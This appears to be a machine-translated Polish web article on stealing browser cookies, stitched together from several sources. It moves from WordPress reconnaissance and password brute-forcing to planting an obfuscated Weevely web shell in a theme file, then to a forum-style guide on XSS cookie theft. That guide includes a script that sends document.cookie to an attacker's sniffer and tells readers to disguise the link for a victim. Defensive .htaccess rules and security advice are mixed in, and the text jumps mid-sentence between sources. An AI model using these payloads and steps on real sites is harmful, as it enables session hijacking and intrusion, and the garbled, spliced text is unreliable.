Jak ukraść ciasteczka. Łatwy sposób na kradzież plików cookie

WordPress to wygodna platforma blogowa do publikowania i zarządzania artykułami, na której opiera się ogromna liczba różnych witryn. Ze względu na swoją powszechność ten CMS od dawna stanowi łakomy kąsek dla atakujących. Niestety podstawowe ustawienia nie zapewniają wystarczającego poziomu ochrony, pozostawiając wiele domyślnych luk niezamkniętych. W tym artykule przejdziemy przez typową ścieżkę „typowego” włamania do witryny WordPress, a także pokażemy, jak wyeliminować zidentyfikowane luki.

Obecnie WordPress jest najpopularniejszym systemem zarządzania treścią. Jego udział wynosi 60,4% ogólnej liczby witryn korzystających z silników CMS. Spośród nich, według statystyk, 67,3% witryn opiera się na najnowsza wersja dany oprogramowanie. Tymczasem w ciągu dwunastu lat istnienia silnika internetowego odkryto w nim 242 różnego rodzaju podatności (z wyłączeniem podatności wykrytych we wtyczkach i motywach firm trzecich). A statystyki dodatków innych firm wyglądają jeszcze smutniej. W ten sposób firma Revisium przeanalizowała 2350 zrusyfikowanych szablonów WordPress pobranych z różnych źródeł. W rezultacie odkryli, że ponad połowa (54%) została zainfekowana powłokami internetowymi, backdoorami, linkami Blackhat SEO („spamem”), a także zawierała skrypty z krytycznymi lukami w zabezpieczeniach. Więc usiądź wygodnie, teraz wymyślimy, jak przeprowadzić audyt witryny WordPress i wyeliminować znalezione niedociągnięcia. Będziemy używać wersji 4.1 (zrusyfikowanej).

Pierwszym krokiem w każdym teście jest zwykle zebranie informacji o celu. I tu często pomaga. nieprawidłowe ustawienie indeksowanie serwisu, które umożliwia nieupoważnionym użytkownikom przeglądanie zawartości poszczególnych sekcji serwisu i np. pozyskiwanie informacji nt zainstalowane wtyczki i tematów, a także dostęp do poufnych danych lub kopie zapasowe bazy danych. Aby sprawdzić, które katalogi są widoczne z zewnątrz, najłatwiej jest skorzystać z Google. Wystarczy uzupełnić Zapytanie Google Dorks lubią site:example.com intitle:"index of" inurl:/wp-content/ . W instrukcji inurl: można określić następujące katalogi:

/wp-content/ /wp-content/languages/plugins /wp-content/languages/themes /wp-content/plugins/ /wp-content/themes/ /wp-content/uploads/

Jeśli zajrzysz do /wp-content/plugins/ , kolejny krok zbierania informacji o zainstalowanych wtyczkach i ich wersjach jest znacznie łatwiejszy. Naturalnie możesz wyłączyć indeksowanie za pomocą pliku robots.txt. Ponieważ domyślnie nie jest on zawarty w pakiecie instalacyjnym WordPressa, musisz go utworzyć samodzielnie i umieścić w katalogu głównym witryny. Podręczników dotyczących tworzenia i pracy z plikiem robots.txt jest całkiem sporo, dlatego ten temat pozostawię do samodzielnego przygotowania. Podam tylko jedną z możliwych opcji:

Agent użytkownika: * Disallow: /cgi-bin Disallow: /wp-login.php Disallow: /wp-admin/ Disallow: /wp-includes/ Disallow: /wp-content/ Disallow: /wp-content/plugins/ Disallow : /wp-content/themes/ Zabroń: /?author=* Zezwól: /

Jeśli pliki przechowywane w folderze przesyłania zawierają informacje poufne, dodaj do tej listy wiersz: Disallow: /wp-content/uploads/.
Z drugiej strony nie zaleca się umieszczania w pliku robots.txt linków do katalogów, które zostały utworzone specjalnie do przechowywania wrażliwych informacji. W przeciwnym razie ułatwisz atakującemu zadanie, ponieważ jest to pierwsze miejsce, w które zwykle wszyscy zaglądają w poszukiwaniu czegoś „ciekawego”.

Kolejnym ważnym krokiem jest identyfikacja Wersje CMSa. W przeciwnym razie, jak wybrać odpowiedni exploit? Są trzy szybkie sposoby w celu ustalenia wersji WordPressa używanej na stronie:

Jedna z opcji ochrony w tym przypadku- ogranicz dostęp do plików readme.html i ru_RU.po za pomocą .htaccess.

Badania nad bezpieczeństwem WordPressa nie rozpoczęły się wczoraj, dlatego istnieje wystarczająca liczba narzędzi, które pozwalają zautomatyzować rutynowe zadania.

• wykrywanie wersji i motywu za pomocą skryptu http-wordpress-info nmap -sV --script http-wordpress-info
• odgadywanie hasła za pomocą słowników nmap -p80 --script http-wordpress-brute --script-args "userdb=users.txt,passdb=passwords.txt" example.com

• moduł do ustalenia wersji: pomocniczy/scanner/http/wordpress_scanner ;
• moduł do ustalania nazwy użytkownika pomocniczy/skaner/http/wordpress_login_enum .

• lista zainstalowanych wtyczek: wpscan --url www.exmple.com --enumerate p ;
• lista zainstalowanych motywów: wpscan --url www.exmple.com --enumerate t ;
• wylicz zainstalowane Timthumby: wpscan --url www.example.com --enumerate tt ;
• określenie nazwy użytkownika: wpscan --url www.example.com --enumerate u ;
• wybór hasła przy użyciu słownika dla użytkownika admin: wpscan --url www.example.com --wordlistwordlist.txt --username admin ;
• odgadywanie hasła przy użyciu kombinacji nazwa użytkownika/hasło z liczbą wątków równą 50: wpscan --url www.example.com --wordlistwordlist.txt --threads 50 .

Zbierzmy teraz informacje o zainstalowanych wtyczkach i motywach, niezależnie od tego, czy są aktywowane, czy nie. Przede wszystkim takie informacje można wydobyć z kodu źródłowego strony HTML, na przykład z linków JavaScript, z komentarzy i zasobów typu CSS, które są ładowane na stronę. Jest to najprostszy sposób uzyskania informacji o zainstalowanych komponentach. Na przykład poniższe linie wskazują używany motyw dwudziestu jedenastu:

Ponieważ informacje o wtyczkach nie zawsze są wyświetlane w kodzie źródłowym strony HTML, zainstalowane komponenty można wykryć za pomocą narzędzia WPScan (patrz pasek boczny). Pamiętaj tylko, że przeszukiwanie ścieżek wtyczek zostanie zapisane w logach serwera WWW.
Po otrzymaniu danych o zainstalowanych komponentach możesz samodzielnie rozpocząć wyszukiwanie podatności lub znaleźć publicznie dostępne exploity na zasobach typu Rapid7 lub exploit-db.

Domyślnie WordPress przypisuje każdemu użytkownikowi unikalny identyfikator reprezentowany w postaci liczby: example.com/?author=1 . Sortując liczby, ustalisz nazwiska użytkowników witryny. Konto administrator admin, który jest tworzony w trakcie procesu Instalacje WordPressa, znajduje się pod numerem 1, dlatego zaleca się jego usunięcie w ramach środków ochronnych.

Znając nazwę użytkownika, możesz spróbować odgadnąć hasło do panelu administracyjnego. Formularz logowania do WordPressa na stronie wp-login.php jest bardzo pouczający (ryc. 3), szczególnie dla atakującego: jeśli wprowadzisz nieprawidłowe dane, pojawi się monit o podanie błędnej nazwy użytkownika lub hasła dla konkretnego użytkownika. Twórcy są świadomi tej funkcji, ale zdecydowali się z niej zrezygnować, ponieważ takie wiadomości są wygodne dla użytkowników, którzy mogli zapomnieć swój login i/lub hasło. Problem odgadnięcia hasła można rozwiązać za pomocą silne hasło, składający się z dwunastu lub więcej znaków i zawierający wielkie litery i małe litery, cyfry i znaki specjalne. Lub na przykład za pomocą wtyczki Login LockDown.

Po zresetowaniu hasła nic nie stoi na przeszkodzie, aby przesłać powłokę do zaatakowanego zasobu sieciowego. Do tych celów całkiem odpowiedni jest framework Weevely, który pozwala wygenerować powłokę w zaciemnionej formie, co znacznie utrudnia jej wykrycie. Aby uniknąć wzbudzania podejrzeń, powstały kod można wstawić do dowolnego pliku motywu (na przykład indeks.php) za pomocą edytora motywów konsoli WordPress. Następnie za pomocą tego samego Weevely możesz połączyć się z maszyną ofiary i wywołać różne polecenia:

Python weevely.py http://test/index.php Pa$$w0rd [+] weevely 3.1.0 [+] Target:test [+] Sesja: _weevely/sessions/test/index_0.session [+] Przeglądaj system plików lub wykonaj polecenia rozpoczyna połączenie [+] z celem. Wpisz:help, aby uzyskać więcej informacji. weevely>: pomocy

Aby odmówić dostępu do wrażliwych informacji, lepiej jest użyć pliku .htaccess - jest to plik konfiguracyjny używany w Apache Web Server. Rozważmy możliwości tego pliku z punktu widzenia bezpieczeństwa. Za jego pomocą możesz: odmówić dostępu do katalogów i plików, zablokować różne zastrzyki SQL i złośliwe skrypty. W tym celu standardowy plik .htaccess dla CMS WordPress Wersja 4.1 wymaga nieco rozbudowy. Aby zamknąć listę plików i folderów dodaj:

Opcje +FollowSymLinks -Indeksy

RewriteCond %(QUERY_STRING) base64_encode[^(]*\([^)]*\) zablokuje łącza zawierające kodowanie Base64. Pozbądź się linków zawierających tag:

PrzepiszWarunek %(QUERY_STRING) (|%3E)

Skrypty przeciwdziałające próbujące ustawić zmienne globalne lub zmienić zmienną _REQUEST poprzez adres URL:

RewriteCond %(QUERY_STRING) GLOBALNE (=|\[|\%(0,2)) RewriteCond %(QUERY_STRING) _REQUEST (=|\[|\%(0,2))

Aby przeciwdziałać wstrzykiwaniom SQL, blokujemy żądania kierowane do adresów URL zawierających określone słowa kluczowe:

RewriteCond %(query_string) concat.*\( RewriteCond %(query_string) union.*select.*\( RewriteCond %(query_string) union.*all.*select RewriteRule ^(.*)$ indeks.php

Aby zrujnować życie popularnych narzędzi hakerskich, odfiltrowujemy niektóre programy użytkownika:

SetEnvIf klient użytkownika „Indy Library” pobytout=1 SetEnvIf klient użytkownika „libwww-perl” pobytout=1 SetEnvIf klient użytkownika „Wget” pobytout=1 odmowa od env=stayout

Dobrym pomysłem byłoby również ograniczenie dostępu do szczególnie ważnych plików, które przechowują konfigurację lub po prostu mogą przekazać atakującemu pewne informacje. Można wyróżnić następujących kandydatów:

• wp-config.php , zawiera nazwę bazy danych, nazwę użytkownika, hasło i prefiks tabeli;
• .htaccess ;
• readme.html i ru_RU.po, które zawierają wersję WordPress;
• zainstaluj.php .

Odbywa się to w następujący sposób:

Zamów Zezwól, Odmów Odmów wszystkim

Co więcej, plik .htaccess zawierający te linie musi znajdować się w tym samym katalogu, co plik chroniony. Następnie zabraniamy umieszczania listy użytkowników (pamiętasz, że tuż powyżej mówiliśmy o tym, jak łatwo jest uzyskać listę użytkowników?):

RewriteCond %(QUERY_STRING) autor=\d RewriteRule ^ /?

Co jeszcze? Można zezwolić na logowanie tylko z określonych adresów IP. Aby to zrobić, utwórz plik .htaccess w folderze wp-admin z następującymi regułami:

AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "Kontrola dostępu" AuthType Podstawowa odmowa kolejności, zezwól na odmowę ze wszystkich zezwól od 178.178.178.178 # IP komputera domowego zezwól od 248.248.248.248 # IP komputera roboczego

Metoda nie jest zbyt elastyczna i ma zastosowanie tylko wtedy, gdy pracujesz z ograniczoną liczbą stałych adresów IP. W W przeciwnym razie Zalecane jest ustawienie hasła do folderu wp-admin poprzez panel hostingowy (o ile taka funkcjonalność jest dostępna).

Do tego, co powiedziano powyżej, można dodać następujące zalecenia. Po pierwsze, używaj tylko aktualne wersje WordPress i jego komponenty - to wyeliminuje znane luki. Po drugie, usuń nieużywane wtyczki i motywy, które również można wykorzystać. Po trzecie, pobierz motywy i Wtyczki do WordPressa z wiarygodnych źródeł, takich jak strony programistów i oficjalna witryna WordPress. Podobnie jak Twój komputer domowy, musisz okresowo sprawdzać zasoby internetowe za pomocą internetowego programu antywirusowego, na przykład AI-Bolit. Jeśli masz dostęp do serwera WWW, skonfiguruj prawa dostępu do plików i katalogów. Z reguły WordPress ustawia wszystkie niezbędne uprawnienia na etapie instalacji, ale w razie potrzeby chmod można ustawić ręcznie. Dla katalogów - chmod 755, dla plików - chmod 644. Upewnij się, że uprawnienia 777 są przypisane tylko do obiektów, które ich potrzebują (czasami jest to konieczne normalne działanie niektóre wtyczki). Jeśli WordPress przestanie normalnie działać, poeksperymentuj z uprawnieniami: najpierw spróbuj 755, potem 766, a na koniec 777. Dla wszystkich plików htaccess ustaw chmod 444 (tylko do odczytu). Jeśli witryna przestanie działać, spróbuj poeksperymentować z wartościami 400, 440, 444, 600, 640, 644.

Przenieś plik wp-config.php. Ten plik zawiera informacje o ustawieniach MySQL, prefiksie tabeli, tajnych kluczach itp. Dlatego należy go przenieść, aby plik nie był dostępny z Internetu. Jeżeli witryna nie znajduje się w folderze public_html to przenieś plik wp-config.php do wyższego folderu, a WordPress automatycznie odnajdzie go w tym katalogu głównym (dotyczy jeśli hosting posiada tylko jedną witrynę na tym CMS-ie).

Aby utrudnić zapełnienie powłoki, wyłącz możliwość edycji motywu poprzez konsolę WordPress. Aby to zrobić, wstaw następującą linię do pliku wp-config.php: zdefiniować("DISALLOW_FILE_EDIT", true); .

Kolejnym słabym punktem jest plik install.php (który znajduje się w folderze wp-admin). Dlatego lepiej to usunąć, zablokować lub zmienić. Wykonaj jedną z opcji:

Oprócz powiadamiania osób odwiedzających witrynę, skrypt ten wykonuje następujące działania:

• wysyła do klienta i wyszukiwarek kod statusu 503 („Usługa chwilowo niedostępna”);
• wskazuje okres czasu, po którym klienci i wyszukiwarki może wrócić do witryny (parametr konfigurowalny);
• powiadamia przez e-mail o problemie z bazą danych, aby można było podjąć odpowiednie środki.

Faktem jest, że we wcześniejszych wersjach WordPressa (alert() i kliknij „znajdź”
Pojawi się okno z xss, co oznacza, że ​​xss jest obecny (być może do czasu przeczytania tego artykułu ten xss będzie już usunięty).

2.2.Aktywny XSS
Taki css może znajdować się np. w polach profilu, przy dodawaniu newsa w tytule newsa oraz w samym newsie (rzadziej), w wiadomościach na forach/czatach/pokojach gościnnych z włączoną obsługą HTML. Tutaj wszystko jest proste, wpisujemy w odpowiednie pola skrypt z poprzedniego akapitu i jeśli na ekranie wyświetli się komunikat, oznacza to, że podatność występuje.
Przyjrzyjmy się xss w tagach BB na forach.
Możesz spróbować po prostu wstawić kod JavaScript do tagu, na przykład tak:
javascript:alert('xss')
Niektóre tagi mają parametry, na przykład tag ma parametry dynsrc i lowsrc, spróbujmy zastąpić kod w ten sposób:
http://www.site.ru/image.jpg dynsrc=javascript:alert(‚xss”)
Jeśli skrypt zadziałał, pojawi się xss

3. Używanie XSS do kradzieży plików cookie
Teraz najsmaczniejsze))))
Aby ukraść pliki cookie, potrzebujemy sniffera sieciowego, możesz zainstalować jakiś sniffer na swoim hostingu lub możesz użyć sniffera online, którego jest teraz mnóstwo.
Aby ukraść pliki cookie za pomocą pasywnego XSS, ofiara musi skorzystać z trującego łącza. Aby ukraść pliki cookie, zamiast alert('xss') użyjemy innego skryptu:
img = nowy obraz();


podstawiamy skrypt do linku i pozwalamy ofierze podążać za nim, przeglądać dziennik sniffera i cieszyć się.
Spójrzmy na przykład.
Weźmy XSS na Ramblerze z poprzedniego akapitu.
Wstawiamy
">
img = nowy obraz();
img.src = "adres obrazu sniffera"+document.cookie;

w formularzu wyszukiwania kliknij „znajdź”, spójrz na pasek adresu i zobacz:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Wysyłamy ten link ofierze i cieszymy się plikami cookie.
Widząc taki link, ofiara może coś podejrzewać, dlatego wskazane jest zakodowanie
">img = nowy obraz();img.src = "adres obrazu sniffera"+document.cookie;
w adresie URL Lub skorzystaj z usług takich jak http://tinyurl.com/
Przejdźmy do aktywnego XSS, tutaj wszystko jest proste, zamiast alert() wstawiamy img = new Image();img.src = "adres obrazu sniffera"+document.cookie;

Teraz mamy ciasteczka. Ale co z nimi zrobić? To proste, musisz je zastąpić zamiast własnego. W Przeglądarka Opera jest wbudowany edytor plików cookie (narzędzia->zaawansowane->zarządzanie plikami cookie), jest wtyczka do Firefoksa (nie pamiętam jak się nazywa, użyj Google)
Na razie tyle, być może artykuł zostanie uzupełniony

Zdjęcie pokazuje, że plik cookie zawiera wiersz wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. Ta wartość jest w postaci niezaszyfrowanej w pliku cookie i można ją łatwo przechwycić za pomocą narzędzia Achilles, ale w większości przypadków w Achilles można zobaczyć tylko skrót określonego wpisu. Przed wysłaniem żądania do serwera możesz spróbować zastąpić tę linię dowolną podobną (choć w tym przypadku nie ma to sensu) - liczba prób nie jest ograniczona. Następnie wysyłając to żądanie do serwera za pomocą przycisku Wyślij, możesz otrzymać odpowiedź z serwera przeznaczoną dla administratora.

W poprzednim przykładzie możesz użyć bezpośredniego fałszowania identyfikatora użytkownika. Dodatkowo nazwa parametru, zastępując którego wartość podaje dodatkowe funkcje haker, może mieć następującą postać: użytkownik (na przykład USER=JDOE), dowolne wyrażenie z ciągiem identyfikacyjnym (na przykład USER=JDOE lub SESSIONID=BLAHBLAH), admin (na przykład ADMIN=TRUE), sesja (na przykład , SESJA=AKTYWNY), koszyk (np. KOSZYK=PEŁNY), a także wyrażenia takie jak PRAWDA, FAŁSZ, AKTYWNY, NIEAKTYWNY. Zazwyczaj format plików cookie jest w dużym stopniu zależny od zastosowania, w jakim są używane. Jednakże te wskazówki dotyczące wyszukiwania wad aplikacji za pomocą plików cookie dotyczą prawie wszystkich formatów.

W przypadek ogólny Użytkownicy powinni zachować ostrożność w stosunku do witryn internetowych, które wykorzystują pliki cookie do uwierzytelniania i przechowywania wrażliwych danych. Należy także pamiętać, że witryna internetowa korzystająca z plików cookies do uwierzytelniania musi obsługiwać min Protokół SSL do szyfrowania nazwy użytkownika i hasła, gdyż w przypadku braku tego protokołu dane przesyłane są w formie niezaszyfrowanej, co pozwala na ich przechwycenie przy użyciu najprostszego oprogramowanie aby wyświetlić dane przesyłane przez sieć.

Kookaburra Software opracowało narzędzie ułatwiające korzystanie z plików cookies. Narzędzie to nazywa się CookiePal (http://www.kburra.com/cpal.html (patrz www.kburra.com)). Ten program ma na celu ostrzeganie użytkownika, gdy witryna internetowa próbuje zainstalować plik cookie na komputerze, a użytkownik może zezwolić na tę akcję lub odmówić. Podobne funkcje Blokowanie plików cookie jest obecnie dostępne we wszystkich przeglądarkach.

Innym powodem regularnego instalowania aktualizacji przeglądarek internetowych jest ciągłe wykrywanie luk w zabezpieczeniach tych programów. Zatem Bennet Haselton i Jamie McCarthy stworzyli skrypt, który po kliknięciu łącza pobiera pliki cookie z komputera klienta. Dzięki temu dostępna staje się cała zawartość plików cookies znajdujących się na urządzeniu użytkownika.

Tego typu hackowanie można również przeprowadzić za pomocą uchwytu osadzonego w tekście HTML strony internetowej (lub w treści HTML e-mail lub grupy dyskusyjne) w celu kradzieży plików cookie. Rozważ następujący przykład:

Aby mieć pewność, że takie rzeczy nie zagrażają naszym danym osobowym, robię to sam i radzę każdemu, aby zawsze aktualizował oprogramowanie współpracujące z kodem HTML (klienty poczty e-mail, odtwarzacze multimedialne, przeglądarki itp.).

Wiele osób woli po prostu blokować pliki cookie, ale większość witryn internetowych wymaga przeglądania plików cookie. Wniosek - jeśli w niedalekiej przyszłości pojawi się innowacyjna technologia, która pozwoli obejść się bez plików cookie, programiści i administratorzy odetchną z ulgą, ale na razie ciasteczka pozostają łakomym kąskiem dla hakera! To prawda, ponieważ lepsza alternatywa jeszcze nie istnieje.

Jeśli chodzi o zalecenia dotyczące zapewnienia bezpieczeństwa serwera, eksperci dają jedną prostą radę: nie używaj mechanizmu cookies, jeśli nie jest to absolutnie konieczne! Szczególną ostrożność należy zachować przy korzystaniu z plików cookies, które pozostają w systemie użytkownika po zakończeniu sesji komunikacyjnej.

Oczywiście ważne jest, aby zrozumieć, że pliki cookie mogą być wykorzystywane do zapewnienia bezpieczeństwa serwerom internetowym w celu uwierzytelniania użytkowników. Jeśli Twoja aplikacja musi używać plików cookie, powinieneś skonfigurować mechanizm plików cookie tak, aby używał różnych kluczy krótkotrwałych dla każdej sesji i staraj się nie umieszczać w tych plikach informacji, które mogłyby zostać wykorzystane przez hakerów do włamań (takich jak ADMIN=TRUE) .

Dodatkowo, aby zapewnić większe bezpieczeństwo podczas pracy ciastka możesz użyć szyfrowania, aby zapobiec ekstrakcji ważne informacje. Oczywiście szyfrowanie nie rozwiązuje wszystkich problemów związanych z bezpieczeństwem podczas pracy z technologią plików cookie, ale ta metoda zapobiegnie najbardziej podstawowym hackom opisanym powyżej.

Ciastka- informacje w formularzu plik tekstowy, zapisywane na komputerze użytkownika przez stronę internetową. Zawiera dane uwierzytelniające (login/hasło, identyfikator, numer telefonu, adres skrzynka pocztowa), ustawienia użytkownika, stan dostępu. Przechowywane w profilu przeglądarki.

Hakowanie plików cookie to kradzież (lub „przejęcie”) sesji osoby odwiedzającej zasoby sieciowe. Prywatne informacje stają się dostępne nie tylko dla nadawcy i odbiorcy, ale także dla strony trzeciej – osoby, która przeprowadziła przechwycenie.

Złodzieje komputerowi, podobnie jak ich koledzy w prawdziwym życiu, oprócz umiejętności, zręczności i wiedzy, mają oczywiście także własne narzędzia - rodzaj arsenału kluczy głównych i sond. Przyjrzyjmy się najpopularniejszym sztuczkom, których używają hakerzy, aby wyodrębnić pliki cookie od użytkowników Internetu.

Programy specjalne do śledzenia i analizy ruch sieciowy. Ich nazwa pochodzi od angielskiego czasownika „sniff” (sniff), ponieważ. dosłownie „wyszukuje” przesyłane pakiety pomiędzy węzłami.

Jednak osoby atakujące używają sniffera do przechwytywania danych sesji, wiadomości i innych danych informacje poufne. Celem ich ataków są głównie niezabezpieczone sieci, do których pliki cookies wysyłane są w otwartej sesji HTTP, czyli praktycznie nie są szyfrowane. (Publiczne Wi-Fi jest pod tym względem najbardziej podatne na zagrożenia.)

Aby osadzić sniffera w kanale internetowym pomiędzy węzłem użytkownika a serwerem WWW, stosuje się następujące metody:

• „nasłuchiwanie” interfejsów sieciowych (koncentratory, przełączniki);
• rozgałęzianie i kopiowanie ruchu;
• łączenie się z luką w kanale sieciowym;
• analiza poprzez specjalne ataki, które przekierowują ruch ofiary do sniffera (podrabianie adresów MAC, fałszowanie adresów IP).

Skrót XSS oznacza Cross Site Scripting. Służy do atakowania stron internetowych w celu kradzieży danych użytkownika.

Zasada XSS jest następująca:

• osoba atakująca wstawia złośliwy kod (specjalny ukryty skrypt) na stronie internetowej, forum lub w wiadomości (na przykład podczas korespondencji w sieci społecznościowej);
• ofiara przechodzi na zainfekowaną stronę i aktywuje zainstalowany kod na swoim komputerze (klika, korzysta z łącza itp.);
• z kolei wykonany złośliwy kod „wyciąga” z przeglądarki poufne dane użytkownika (w szczególności pliki cookies) i wysyła je na serwer WWW osoby atakującej.

Aby „wszczepić” programowy mechanizm XSS, hakerzy wykorzystują różnego rodzaju luki w serwerach internetowych, usługach online i przeglądarkach.

Wszystkie luki XSS dzielą się na dwa typy:

• Pasywny. Atak następuje poprzez żądanie określonego skryptu na stronie internetowej. Złośliwy kod można wprowadzać do różnych formularzy na stronie internetowej (na przykład do paska wyszukiwania witryny). Najbardziej podatne na pasywne XSS są zasoby, które nie filtrują znaczników HTML po nadejściu danych;
• Aktywny. Znajduje się bezpośrednio na serwerze. Są one aktywowane w przeglądarce ofiary. Są aktywnie wykorzystywane przez oszustów na wszelkiego rodzaju blogach, czatach i kanałach informacyjnych.

Hakerzy starannie „kamuflują” swoje skrypty XSS, aby ofiara niczego nie podejrzewała. Zmieniają rozszerzenie pliku, przekazują kod w postaci obrazu, motywują do kliknięcia linku i przyciągają ciekawą treścią. W rezultacie: użytkownik komputera PC, nie mogąc zapanować nad własną ciekawością, własnoręcznie (kliknięciem myszy) wysyła sesyjne pliki cookie (z loginem i hasłem!) do autora skryptu XSS – komputerowego złoczyńcy.

Wszystkie pliki cookies są zapisywane i wysyłane na serwer WWW (z którego „pochodzą”) w stanie niezmienionym – w oryginalnej formie – z tymi samymi wartościami, ciągami znaków i innymi danymi. Świadoma modyfikacja ich parametrów nazywana jest substytucją plików cookies. Innymi słowy, podmieniając pliki cookie, atakujący udaje, że myśli pobożnie. Przykładowo podczas dokonywania płatności w sklepie internetowym plik cookie obniża kwotę płatności – następuje w ten sposób „oszczędność” na zakupach.

Skradzione sesyjne pliki cookie w sieci społecznościowej z konta innej osoby są „wstawiane” do innej sesji i na innym komputerze. Właściciel skradzionych plików cookie uzyskuje pełny dostęp do konta ofiary (korespondencja, treść, ustawienia strony), dopóki znajduje się ona na swojej stronie.

„Edycja” plików cookies odbywa się za pomocą:

• funkcje” Zarządzaj plikami cookie…” w przeglądarce Opera;
• Dodatki do Menedżera plików cookie i Zaawansowanego menedżera plików cookie dla FireFox;
• Narzędzia IECookiesView (tylko dla Internet Explorera);
• edytor tekstu jak AkelPad, NotePad lub Notatnik Windows.

Bardzo prosty obwód wdrożenie składa się z kilku etapów. Ale jest skuteczny tylko wtedy, gdy komputer ofiary z otwartą sesją, na przykład VKontakte, pozostanie bez nadzoru (i to przez długi czas!):

Z reguły hakerzy używają powyższych narzędzi (+ innych) zarówno w połączeniu (ponieważ poziom ochrony wielu zasobów internetowych jest dość wysoki), jak i osobno (gdy użytkownicy są nadmiernie naiwni).

A co najważniejsze, nie trać czujności i uwagi podczas relaksu lub pracy w Internecie!